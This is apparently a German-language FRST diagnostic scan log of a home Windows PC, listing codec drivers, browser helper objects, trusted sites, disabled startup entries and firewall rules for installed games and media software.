HKLM\...\Drivers32: [VIDC.XVID] => C:\Windows\system32\xvidvfw.dll [311296 2018-01-28] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.ac3acm] => C:\Windows\system32\AC3ACM.acm [180736 2012-07-21] (fccHandler) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.voxacm160] => C:\Windows\system32\vct3216.acm [82944 2003-05-21] (Voxware, Inc.) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.scg726] => C:\Windows\system32\scg726.acm [13239 2000-03-14] (SHARP Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.alf2cd] => C:\Windows\system32\alf2cd.acm [38912 2003-05-21] (NCT Company) [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.lame] => C:\Windows\system32\lame.ax [245760 2005-08-01] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.dvsd] => C:\Windows\system32\mcdvd_32.dll [261632 2003-05-21] (MainConcept) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mpg4] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mp42] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.mp43] => C:\Windows\system32\mpg4c32.dll [413760 2002-08-19] (Microsoft Corporation) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\system32\DivX.dll [638976 2003-05-22] (DivXNetworks, Inc.) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP60] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP61] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [vidc.VP62] => C:\Windows\system32\vp6vfw.dll [438272 2004-12-10] (On2.com) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.X264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.LAGS] => C:\Windows\SysWOW64\lagarith.dll [216064 2011-12-07] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [284672 2018-01-28] () [Datei ist nicht signiert]
HKLM\...\Drivers32: [msacm.ac3acm] => C:\Windows\SysWOW64\ac3acm.acm [122880 2012-07-21] (fccHandler) [Datei ist nicht signiert]
HKLM\...\Drivers32: [VIDC.FFDS] => C:\Windows\SysWOW64\ff_vfw.dll [112128 2015-10-24] () [Datei ist nicht signiert]
==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
Shortcut: C:\Users\Tom\Favorites\NCH Software Download Site.lnk -> hxxp://www.nch.com.au/index.htm
Shortcut: C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co
==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
2019-06-17 20:35 - 2013-01-15 16:06 - 000061952 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2019-06-17 20:35 - 2013-06-26 16:01 - 000249856 _____ () [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\language.dll
2020-11-25 22:21 - 2020-11-25 22:21 - 040403968 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\AudibleRT.WindowsPhone.dll
2020-11-15 10:30 - 2020-11-15 10:31 - 000052224 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\AudibleSystemFileWrapperRT.dll
2019-02-20 19:01 - 2019-02-20 19:01 - 001123840 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\e_sqlite3.dll
2019-06-17 20:35 - 2011-11-22 13:22 - 000143360 _____ (Holtek) [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\HIDApi.dll
2018-12-13 17:01 - 2018-04-30 13:00 - 000075776 _____ (Igor Pavlov) [Datei ist nicht signiert] D:\Program Files\7-Zip\7-zip.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\Users\Public\AppData:CSM [468]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [482]
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
URLSearchHook: [S-1-5-21-3451750051-380284315-2914928687-1001] ACHTUNG => Standard URLSearchHook fehlt
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre-10.0.2\bin\ssv.dll => Keine Datei
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre-10.0.2\bin\jp2ssv.dll [2020-06-27] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> D:\Java\2_51\bin\ssv.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> D:\Java\2_51\bin\jp2ssv.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - StExBar - {367D8B32-F9FD-474b-8E65-9E521F35DE99} - C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
Handler-x32: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files (x86)\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL [2000-04-19] (Microsoft Corporation) [Datei ist nicht signiert]
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts Inhalt: =========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2017-09-29 14:46 - 2017-09-29 14:44 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
==================== Andere Bereiche ===========================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Program Files (x86)\Razer\ChromaBroadcast\bin;C:\Program Files\Razer\ChromaBroadcast\bin;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\Business Objects\Common\3.5\bin\NOTES\;C:\Program Files (x86)\Business Objects\Common\3.5\bin\NOTES\DATA\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Calibre2\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\Microsoft SQL Server\120\Tools\Binn\;C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Users\Tom_Admin\AppData\Local\Microsoft\WindowsApps;;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img3.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
HKLM\...\StartupApproved\StartupFolder: => "AutoStart IR.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WinTV Recording Status.lnk"
HKLM\...\StartupApproved\Run: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Updater"
HKLM\...\StartupApproved\Run32: => "RazerCortex"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\StartupApproved\StartupFolder: => "Mounten.bat"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{BD15C3DA-E10D-41D0-B5D5-EE4073BAE9FC}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{D801D41D-AFA4-467A-A7D7-22B79F9F5119}] => (Allow) E:\Steam\steamapps\common\wallpaper_engine\bin\diagnostics32.exe (Kristjan Skutta -> )
FirewallRules: [{5192CB57-269F-4830-B401-243CE137621C}] => (Allow) E:\Steam\steamapps\common\wallpaper_engine\bin\diagnostics32.exe (Kristjan Skutta -> )
FirewallRules: [UDP Query User{EE3FDA50-E1D2-43C2-9F0D-35D87E3F1DB1}D:\destiny 2\destiny2.exe] => (Allow) D:\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [TCP Query User{87167C66-5737-4F03-9D50-3C797A513735}D:\destiny 2\destiny2.exe] => (Allow) D:\destiny 2\destiny2.exe => Keine Datei
FirewallRules: [{0C0F6526-9F01-495E-B99F-7C5C72975E8B}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{A0349E6A-41C4-4855-A948-4C1652AA1068}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{C209067C-0A9E-464C-8DBE-CAA6A9E4E128}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D11E1927-A4AE-4EF5-982A-D1005A8C1EAB}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{35AC40B9-F015-4E98-B7C4-4F8F115557C1}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{AB72C65B-ECB2-4059-95B5-EEB7B291493E}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{2C4E54F7-C88D-481D-9487-2F02DF4A38FC}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{0165E428-627A-4BC0-BEE7-9FD0082986F0}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{BAB32789-534B-4AA4-B1D5-03C070415FF4}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{7C958553-E95B-49CD-9A83-AFABF9450A62}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{29AB5D50-E693-461F-9183-EA5139443FD3}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{13C54269-5FCC-4752-8C89-1A121B264DC0}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12107.3.48019.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{F1FD2F18-57D3-4350-9A03-810C6E7B8AFF}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{1D7C0D77-5B56-4796-9A2C-ED92A9774778}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{3F54FCDD-2F44-4E1E-843A-EAAB9B462CB9}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{4B085E0F-D6CA-4A14-B0AF-DB661D429EFD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9EA32006-E640-4A10-A083-9579DBB93E25}] => (Allow) E:\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe () [Datei ist nicht signiert]
FirewallRules: [{6731630B-B532-4D84-A553-39FE5E91373B}] => (Allow) E:\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe () [Datei ist nicht signiert]
FirewallRules: [{EE313476-C63F-4F31-88A2-59C333476053}] => (Allow) E:\Steam\steamapps\common\100 Orange Juice\100orange.exe () [Datei ist nicht signiert]
FirewallRules: [{3A00DEDF-16D5-48D8-A980-F2D21C83BA9C}] => (Allow) E:\Steam\steamapps\common\100 Orange Juice\100orange.exe () [Datei ist nicht signiert]
FirewallRules: [{70EDCFA4-146C-48DD-9513-68384A778AF0}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp_server.exe (Activision Publishing Inc -> )
FirewallRules: [{94CDA78E-4371-4F4B-856B-8D372AC84EBE}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp_server.exe (Activision Publishing Inc -> )
FirewallRules: [{63AAB744-43E3-45DD-8026-C3BCB423BF4D}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe (Activision Publishing Inc -> )
FirewallRules: [{AC4ADE77-5978-4287-B4D6-8E1F453C2C27}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe (Activision Publishing Inc -> )
FirewallRules: [{1AFF76B9-1497-4A25-9D5B-FD3BD232CF7C}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6mp.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{7BA2BFFB-3087-498A-8BE1-87CF1BA2AF65}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6mp.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{1F3490BB-AC55-4811-8E0A-818157F97E6D}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6sp.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{95D24FC7-FFD9-4C34-ACBC-D3D0334E35FA}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6sp.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{9F6A2D78-39CD-435C-BF8D-FEAB86E2C736}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5sp.exe (Valve Corp. -> ) [Datei ist nicht signiert]
FirewallRules: [{72109CDC-500E-4C2E-A8A0-0D1A9CD3A97E}] => (Allow) E:\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5sp.exe (Valve Corp. -> ) [Datei ist nicht signiert]
FirewallRules: [{9D3F99FC-5ADC-47EA-BBE4-2036D6302C62}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6zm.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [{E796248C-CD9B-4A48-ABB5-2C0366511F66}] => (Allow) E:\Steam\steamapps\common\Call of Duty Black Ops II\t6zm.exe (Valve Corp. -> Activision Publishing Inc.) [Datei ist nicht signiert]
FirewallRules: [UDP Query User{B921D84F-4E37-4195-B698-158146C44AA6}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.130\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.130\opera.exe => Keine Datei
FirewallRules: [TCP Query User{DBCF8B0A-BCB9-4F04-B202-DD4C0FD9230B}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.130\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.130\opera.exe => Keine Datei
FirewallRules: [UDP Query User{CAB2B51D-64FE-4C99-A553-F0994E8A5319}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.105\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.105\opera.exe => Keine Datei
FirewallRules: [TCP Query User{7992D3D0-6D71-471D-BB10-B7622254BF14}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.105\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.105\opera.exe => Keine Datei
FirewallRules: [{C7CE56E5-543A-4CDA-810C-FAD0D1775853}] => (Allow) E:\Steam\steamapps\common\WitchIt\WitchIt\Binaries\Win64\PropWitchHuntModule-Win64-Shipping.exe (G=Barrel Roll Games) [Datei ist nicht signiert]
FirewallRules: [{CF69FE3D-74F5-430B-BE04-6C742F09205E}] => (Allow) E:\Steam\steamapps\common\WitchIt\WitchIt\Binaries\Win64\PropWitchHuntModule-Win64-Shipping.exe (G=Barrel Roll Games) [Datei ist nicht signiert]
FirewallRules: [{F7AEE517-FB88-4DC4-AC1A-E4F67F28E5D7}] => (Allow) E:\Steam\steamapps\common\wallpaper_engine\launcher.exe (Kristjan Skutta -> )
FirewallRules: [{05A8E69F-CE0E-4E92-838E-D8D042912391}] => (Allow) E:\Steam\steamapps\common\wallpaper_engine\launcher.exe (Kristjan Skutta -> )
FirewallRules: [{73C9C9B7-2B9E-4462-B909-649B007E2DE9}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{0C128D12-4F47-4510-9C44-74594AE81B75}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{1910727F-B431-46E1-9DAE-59154E8C9EE5}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{43523A67-08B9-47BD-A539-D4CF85F7D972}] => (Allow) E:\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe (UBISOFT ENTERTAINMENT INC. -> Ubisoft)
FirewallRules: [{B8614B0D-C639-48E2-A796-7FEF3D544968}] => (Allow) E:\Steam\steamapps\common\Doki Doki Literature Club\DDLC.exe () [Datei ist nicht signiert]
FirewallRules: [{804EFEA7-6FD8-4DC2-BB20-3580DC75B674}] => (Allow) E:\Steam\steamapps\common\Doki Doki Literature Club\DDLC.exe () [Datei ist nicht signiert]
FirewallRules: [UDP Query User{B3DAF835-1103-4502-A4F2-333C915492CC}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.87\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.87\opera.exe => Keine Datei
FirewallRules: [TCP Query User{E5237C02-DD9D-412E-9D87-98A20C9F70FD}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.87\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.87\opera.exe => Keine Datei
FirewallRules: [UDP Query User{372F3926-A3A4-439F-BD19-73EB73FC3C7F}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.78\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.78\opera.exe => Keine Datei
FirewallRules: [TCP Query User{BA2FAF92-717B-45F8-BA2A-F1EE91F18215}C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.78\opera.exe] => (Block) C:\users\vincent\appdata\local\programs\opera gx\67.0.3575.78\opera.exe => Keine Datei
FirewallRules: [{F1D77999-207A-4802-A520-8DE20D475A74}] => (Allow) E:\Steam\steamapps\common\Dead by Daylight\DeadByDaylight.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{EE3459FC-3479-43B1-9C9F-77FF4A957F6F}] => (Allow) E:\Steam\steamapps\common\Dead by Daylight\DeadByDaylight.exe (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
FirewallRules: [{3777AA31-B03D-4B65-83CC-4E31445ACB6A}] => (Allow) E:\Steam\steamapps\common\BloonsTD6\BloonsTD6.exe () [Datei ist nicht signiert]
FirewallRules: [{414649EA-3580-4193-BB71-7756C6C0FBBD}] => (Allow) E:\Steam\steamapps\common\BloonsTD6\BloonsTD6.exe () [Datei ist nicht signiert]
FirewallRules: [{529E9E0A-FB5D-436A-A033-7FDF2BEE0F37}] => (Allow) E:\Steam\steamapps\common\War Selection\SteamLauncher.exe () [Datei ist nicht signiert]
FirewallRules: [{ECDF4C86-E8D8-4AE8-8889-3EF2E669EF7D}] => (Allow) E:\Steam\steamapps\common\War Selection\SteamLauncher.exe () [Datei ist nicht signiert]
FirewallRules: [{173E14B5-C91A-4784-9A0E-528881F5C540}] => (Allow) E:\Steam\steamapps\common\SoulWorker\SoulWorker.exe (LIONGAMES Co.,Ltd. -> LION GAMES)
FirewallRules: [{80BAF223-9E21-40D4-9AF9-3166287552E8}] => (Allow) E:\Steam\steamapps\common\SoulWorker\SoulWorker.exe (LIONGAMES Co.,Ltd. -> LION GAMES)
FirewallRules: [{E10E60EA-A979-47B5-8E55-10395ABEAF18}] => (Allow) E:\Steam\steamapps\common\Soundpad\Soundpad.exe (Arthur Lepp -> Leppsoft)
FirewallRules: [{9846D564-21F9-48D8-A5D1-BD97BFA24051}] => (Allow) E:\Steam\steamapps\common\Soundpad\Soundpad.exe (Arthur Lepp -> Leppsoft)
FirewallRules: [UDP Query User{7D8F4D0F-D749-40B8-B516-886EA3FBC537}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [TCP Query User{302357B1-32CB-4A88-8837-6287A6C5D356}C:\program files\blackmagic design\davinci resolve\fuscript.exe] => (Allow) C:\program files\blackmagic design\davinci resolve\fuscript.exe (Blackmagic Design Pty. Ltd.) [Datei ist nicht signiert]
FirewallRules: [{E4ADA23B-0959-4D5D-BFA1-A3F2FAA524CD}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Updater.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{AE6679F5-4B43-4F88-84BE-0FFACD2AE166}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Updater.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{E4BC8C36-999C-48FC-97D4-1707D6391E7C}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Activation.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{C4244604-BB38-4522-A549-C1D1FF99091A}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Activation.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{4E494180-EAE9-44B8-9944-1BD61D095493}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\VideoEditor.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{BF4C51D7-A79D-4D2D-A094-4A290359E085}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\VideoEditor.exe (Vector -> Flash-Integro LLC)
FirewallRules: [{7920A431-019D-4E78-964C-9AA16CAF6946}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe => Keine Datei
FirewallRules: [{53FD37C3-34B9-48F2-9806-E1123527BF7E}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DPDecoder.exe (Blackmagic Design Pty Ltd -> )
FirewallRules: [{B2F24C64-B7EA-4678-BAAE-3D1C4D93CC15}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\OxygenPanelDaemon.exe => Keine Datei
FirewallRules: [{E1FC722E-F384-45FA-B184-358165CC39BD}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\ElementsPanelDaemon.exe => Keine Datei
FirewallRules: [{F368F331-43E6-41B4-AAAE-7992BA2048A0}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\TangentPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{FD6EB5B5-984D-42E5-8DD3-5AD0603AE72E}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\EuphonixPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{36BA625D-6AEB-406B-A524-9877CD8AE707}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\JLCooperPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{2A7DC3AF-2F69-4158-B8E7-9FC5140072D0}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\DaVinciPanelDaemon.exe () [Datei ist nicht signiert]
FirewallRules: [{7F28FC9B-F942-4A1D-81BF-4A43DA75F4A9}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\bmdpaneld.exe () [Datei ist nicht signiert]
FirewallRules: [{AB3D2980-EC58-4FE1-BE3B-C017B65F5E6E}] => (Allow) C:\Program Files\Blackmagic Design\DaVinci Resolve\Resolve.exe (Blackmagic Design Pty Ltd -> Blackmagic Design Pty. Ltd.)
FirewallRules: [UDP Query User{3BDF9600-467C-4F15-ACCE-3CA5FFB5BDAF}C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.111\opera.exe] => (Allow) C:\users\vincent\appdata\local\programs\opera gx\66.0.3515.111\opera.exe => Keine Datei
